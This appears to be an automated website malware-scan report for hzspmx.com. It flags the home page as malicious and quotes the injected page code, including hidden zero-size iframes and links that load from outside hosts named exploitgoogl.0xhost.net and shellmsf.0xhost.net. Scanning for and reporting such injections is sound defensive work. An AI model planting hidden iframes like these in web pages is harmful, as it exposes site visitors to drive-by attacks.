Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hzspmx.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.hzspmx.com/ | 200 OK Content-Length: 36131 Content-Type: text/html | malicious |
Page code contains blacklisted domain: exploitgoogl.0xhost.net.exploitgoogl.0xhost.net ...[1883 bytes skipped]... ; <div id='spdv_10806' class='pdv_top' style='overflow:hidden;width:100%;height:100%'> <div class="pdv_border" style="margin:0;padding:0;height:100%;border:0px #808080 solid;background:#000000;"> <div style="height:25px;margin:1px;display:none;background:#696969;"> <div style="float:left;margin-left:12px;line-height:25px;font-weight:bold;color:#696969"> </div/exploitgoogl.0xhost.net.exploitgoogl.0xhost.net" target="_blank">ç¾å®¶ä¹è´´å§æ¥¼ä¸æ¥¼ç¤¾åº</a> <a href="http://shellmsf.0xhost.net" target="_blank">ç¾å®¶ä¹è´´å§æ¥¼ä¸æ¥¼ç¤¾åº</a> <iframe src="http://exploitgoogl.0xhost.net.exploitgoogl.0xhost.net" height="0" width="0"></iframe> <iframe src="http://shellmsf.0xhost.net/Boke/index.php?mod=member&referer=%3F" height="0" width="0"></iframe> <script type="text/javascript ...[1921 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://shellmsf.0xhost.net/boke/index.php?mod=member&referer=%3f This URL is marked by Google as suspicious <iframe src="http://shellmsf.0xhost.net/boke/index.php?mod=member&referer=%3f" height="0" width="0"> Malicious iFrame found. size: 0x0 src: http://exploitgoogl.0xhost.net.exploitgoogl.0xhost.net This URL is marked by Google as suspicious <iframe src="http://exploitgoogl.0xhost.net.exploitgoogl.0xhost.net" height="0" width="0"> | ||
http://www.hzspmx.com/base/js/base.js | 200 OK Content-Length: 31131 Content-Type: application/x-javascript | clean |
http://www.hzspmx.com/base/js/common.js | 200 OK Content-Length: 10754 Content-Type: application/x-javascript | clean |
http://www.hzspmx.com/base/js/form.js | 200 OK Content-Length: 16332 Content-Type: application/x-javascript | clean |
http://www.hzspmx.com/base/js/blockui.js | 200 OK Content-Length: 12587 Content-Type: application/x-javascript | clean |
http://www.hzspmx.com/advs/js/advsheadlb.js | 200 OK Content-Length: 702 Content-Type: application/x-javascript | clean |
http://shellmsf.0xhost.net/go.js | HTTP/1.1 200 OK Date: Sun, 18 Jan 2015 19:36:48 GMT Accept-Ranges: bytes ETag: "07f5122f824d01:0" Server: Microsoft-IIS/7.5 Content-Length: 1269 Content-Type: text/html Last-Modified: Wed, 31 Dec 2014 12:48:54 GMT | clean |
http://shellmsf.0xhost.net/zm9yy2vtug | HTTP/1.1 200 OK Date: Sun, 18 Jan 2015 19:36:51 GMT Accept-Ranges: bytes ETag: "4af85721f824d01:0" Server: Microsoft-IIS/7.5 Content-Length: 1269 Content-Type: text/html Last-Modified: Wed, 31 Dec 2014 12:48:52 GMT | clean |
http://shellmsf.0xhost.net/test404page.js | HTTP/1.1 200 OK Date: Sun, 18 Jan 2015 19:36:51 GMT Accept-Ranges: bytes ETag: "07f5122f824d01:0" Server: Microsoft-IIS/7.5 Content-Length: 1269 Content-Type: text/html Last-Modified: Wed, 31 Dec 2014 12:48:54 GMT | clean |
http://js.users.51.la/439714.js | 200 OK Content-Length: 1879 Content-Type: application/x-javascript | clean |
http://count7.51yes.com/click.aspx?id=78397509&logo=1 | 200 OK Content-Length: 1773 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hzspmx.com
Result:
GET / HTTP/1.1
Host: hzspmx.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: hzspmx.com
Referer: http://www.google.com/search?q=hzspmx.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hzspmx.com
Referer: http://www.google.com/search?q=hzspmx.com
Result:
The result is similar to the first query. There are no suspicious redirects found.